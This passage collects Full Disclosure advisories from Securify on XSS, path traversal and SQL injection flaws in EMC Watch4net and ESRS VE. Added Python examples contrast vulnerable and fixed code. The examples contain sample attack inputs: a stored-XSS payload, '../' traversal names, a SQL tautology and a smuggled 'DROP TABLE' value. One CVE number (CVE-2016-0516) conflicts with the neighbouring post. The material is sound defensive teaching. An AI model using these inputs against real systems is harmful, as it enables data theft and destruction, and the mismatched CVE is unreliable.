keystrokes, or exploiting issues in other areas of Watch4net.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior to 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0513
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141104/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__alerting_frontend.html

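The three Watch4net advisories above describe the same flaw class: a value an attacker can store (a startup-report favorite, a console field, an alert) is later written into a page unencoded and runs in every victim's browser. The following is an added illustration, not Securify's or EMC's code and not the Watch4net code path; the profile store, the page template and the audit pattern are constructed for the example. It shows the vulnerable rendering beside the hardened one, and an audit that flags stored values which already carry markup, since fixing the encoder does not clean data stored before the fix.

```python
import html
import re

# Constructed sample profile store (user -> stored startup-report name).
# The second entry stands in for a value an attacker managed to store.
PROFILES = {
    "alice": "Capacity Overview",
    "mallory": '<img src=x onerror="alert(1)">',
}


def render_startup_vulnerable(user: str) -> str:
    """Interpolates the stored value into HTML without encoding: the stored
    XSS pattern, where whatever sits in the profile runs at every login."""
    return f"<h1>Startup report: {PROFILES[user]}</h1>"


def render_startup_fixed(user: str) -> str:
    """Same page, but the value is HTML-encoded for a text context.
    quote=True also encodes quotes, so the same helper is safe inside
    double-quoted attribute values."""
    return f"<h1>Startup report: {html.escape(PROFILES[user], quote=True)}</h1>"


# Tags, inline event handlers and javascript: URLs in a field that should
# only ever hold a report title. Coarse on purpose: an audit hint for
# reviewing stored data, not a replacement for output encoding.
MARKUP_RE = re.compile(r"<\s*/?[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def audit_profiles(profiles: dict) -> list:
    """Returns users whose stored preference already carries markup, so that
    data stored before the encoder was fixed can be reviewed and cleaned."""
    return sorted(user for user, value in profiles.items() if MARKUP_RE.search(value))


if __name__ == "__main__":
    for user in PROFILES:
        print("vulnerable:", render_startup_vulnerable(user))
        print("fixed:     ", render_startup_fixed(user))
    print("profiles to review:", audit_profiles(PROFILES))
```

Encoding at output time, chosen for the context the value lands in (text, attribute, URL, script), is the fix; the audit only helps find what is already in the database.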


[FD] Path traversal vulnerability in EMC MR (Watch4net) MIB Browser

2015-03-18 Thread Securify B.V.


Path traversal vulnerability in EMC MR (Watch4net) MIB Browser

Han Sahin, November 2014


Abstract

A path traversal vulnerability was found in EMC MR (Watch4net) MIB
Browser. This vulnerability allows an attacker to access sensitive files
containing configuration data, passwords, database records, log data,
source code, and program scripts and binaries.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior to 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0516
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141105/path_traversal_vulnerability_in_emc_m_r__watch4net__mib_browser.html



[FD] Path traversal vulnerability in EMC MR (Watch4net) Device Discovery

2015-03-18 Thread Securify B.V.


Path traversal vulnerability in EMC MR (Watch4net) Device Discovery

Han Sahin, November 2014


Abstract

A path traversal vulnerability was found in EMC MR (Watch4net) Device
Discovery. This vulnerability allows an attacker to access sensitive
files containing configuration data, passwords, database records, log
data, source code, and program scripts and binaries.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior to 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2016-0516
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141106/path_traversal_vulnerability_in_emc_m_r__watch4net__device_discovery.html

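The MIB Browser and Device Discovery advisories above both concern path traversal: a file name taken from the request is joined onto a base directory, and a name containing ".." (or an absolute path) reaches files outside it. The following is an added example that serves both posts; it is not Securify's or EMC's code and does not reproduce the Watch4net code path. The directory layout, file names and the "mibs" base directory are constructed for the illustration. It shows the string-join pattern that leaks a file beside a canonicalise-then-check resolver.

```python
import os
import tempfile
from pathlib import Path


def build_sample_tree() -> Path:
    """Constructed layout: a 'mibs' directory that the browser is meant to
    serve, next to a configuration file it must never expose."""
    root = Path(tempfile.mkdtemp(prefix="traversal_example_"))
    (root / "mibs").mkdir()
    (root / "mibs" / "IF-MIB.txt").write_text("IF-MIB DEFINITIONS ::= BEGIN\n")
    (root / "conf").mkdir()
    (root / "conf" / "db.properties").write_text("db.password=constructed-secret\n")
    return root


def read_mib_vulnerable(root: Path, name: str) -> str:
    """Joins the user-supplied name onto the base directory as a string.
    A name containing '..' walks out of 'mibs'; an absolute name replaces
    the base entirely, because os.path.join discards earlier components."""
    with open(os.path.join(root, "mibs", name)) as f:
        return f.read()


def resolve_mib_path(root: Path, name: str):
    """Canonicalises base and candidate (collapsing '..' and symlinks) and
    accepts the candidate only if it still lies under the base directory.
    Returns the resolved Path, or None when the name escapes the base."""
    base = (root / "mibs").resolve()
    candidate = (base / name).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


def read_mib_fixed(root: Path, name: str) -> str:
    """Serves a file only after the resolver confirmed it is inside 'mibs'."""
    target = resolve_mib_path(root, name)
    if target is None or not target.is_file():
        raise PermissionError(f"refusing to serve {name!r}")
    return target.read_text()


def demo() -> dict:
    """Runs both readers against the constructed tree and reports what each
    did, so the effect of the fix can be checked without a server."""
    root = build_sample_tree()
    leaked = read_mib_vulnerable(root, "../conf/db.properties")
    try:
        read_mib_fixed(root, "../conf/db.properties")
        blocked = False
    except PermissionError:
        blocked = True
    return {
        "legit_ok": read_mib_fixed(root, "IF-MIB.txt").startswith("IF-MIB"),
        "vulnerable_leaked_secret": "constructed-secret" in leaked,
        "fixed_blocked_traversal": blocked,
        "absolute_name_rejected": resolve_mib_path(root, "/etc/hostname") is None,
    }


if __name__ == "__main__":
    print(demo())
```

The check is done on the resolved path rather than by rejecting the substring "..", because encoded or platform-specific separators and symlinks can bypass a string filter; resolving both sides and comparing is what holds. Running the service account with read access only to the directories it needs limits what a miss would expose.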


[FD] EMC Secure Remote Services Virtual Edition Provisioning component is affected by SQL injection

2015-03-18 Thread Securify B.V.


EMC Secure Remote Services Virtual Edition Provisioning component is
affected by SQL injection

Han Sahin, November 2014


Abstract

An SQL injection vulnerability was found in EMC Secure Remote Services
Virtual Edition (ESRS VE) that allows an attacker to retrieve arbitrary
data from the application, interfere with its logic, or execute commands
on the database server itself.


Affected versions

EMC reports that the following versions are affected by this
vulnerability:

- EMC Secure Remote Services Virtual Edition 3.02
- EMC Secure Remote Services Virtual Edition 3.03


See also

- CVE-2015-0524
- ESA-2015-040: EMC Secure Remote Services Virtual Edition Security
Update for Multiple Vulnerabilities


Fix

EMC released EMC Secure Remote Services Virtual Edition 3.04 that
resolves this vulnerability. Registered EMC Online Support customers can
download patches and software from support.emc.com at:

EMC Secure Remote Services - EMC Secure Remote Services Virtual Edition
- Downloads


Details

https://www.securify.nl/advisory/SFY20141113/emc_secure_remote_services_virtual_edition_provisioning_component_is_affected_by_sql_injection.html

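The ESRS VE advisory above names SQL injection but gives no detail of the query involved. As an added example that is not Securify's or EMC's code and does not reflect the ESRS VE provisioning component, the block below contrasts a query built by string formatting with one that binds the value as a parameter. The in-memory SQLite table, the device rows and the column allow-list are constructed for the illustration; the allow-list covers the one query part (an identifier such as the ORDER BY column) that parameters cannot bind.

```python
import sqlite3

# Allow-list for the part of a query that cannot be bound as a parameter:
# identifiers such as the ORDER BY column. Constructed for this example.
SORTABLE_COLUMNS = {"id", "serial", "site"}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory inventory standing in for provisioning data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE devices (id INTEGER PRIMARY KEY, serial TEXT, site TEXT)")
    con.executemany(
        "INSERT INTO devices (serial, site) VALUES (?, ?)",
        [("SN-1001", "ams"), ("SN-1002", "ams"), ("SN-2001", "rtm")],
    )
    return con


def devices_vulnerable(con: sqlite3.Connection, site: str) -> list:
    """Builds the WHERE clause by string formatting: the input becomes SQL."""
    rows = con.execute(f"SELECT serial FROM devices WHERE site = '{site}' ORDER BY id")
    return [r[0] for r in rows]


def devices_fixed(con: sqlite3.Connection, site: str, order_by: str = "id") -> list:
    """Binds the value as a parameter, so it is only ever compared as data,
    and validates the identifier against the allow-list because identifiers
    cannot be bound."""
    if order_by not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    rows = con.execute(
        f"SELECT serial FROM devices WHERE site = ? ORDER BY {order_by}", (site,)
    )
    return [r[0] for r in rows]


def demo() -> dict:
    """Runs both variants with a normal value and a tautology string."""
    con = make_db()
    tautology = "ams' OR '1'='1"
    try:
        devices_fixed(con, "ams", order_by="id; DROP TABLE devices")
        bad_sort_rejected = False
    except ValueError:
        bad_sort_rejected = True
    return {
        "normal": devices_fixed(con, "ams"),
        "vulnerable_with_tautology": devices_vulnerable(con, tautology),
        "fixed_with_tautology": devices_fixed(con, tautology),
        "bad_sort_rejected": bad_sort_rejected,
    }


if __name__ == "__main__":
    print(demo())
```

With the tautology string the formatted query returns every row, while the parameterised query compares the literal string against the column and returns nothing. Escaping quotes by hand is not an alternative: the fix is to keep data out of the query text entirely and to restrict identifiers to a fixed set.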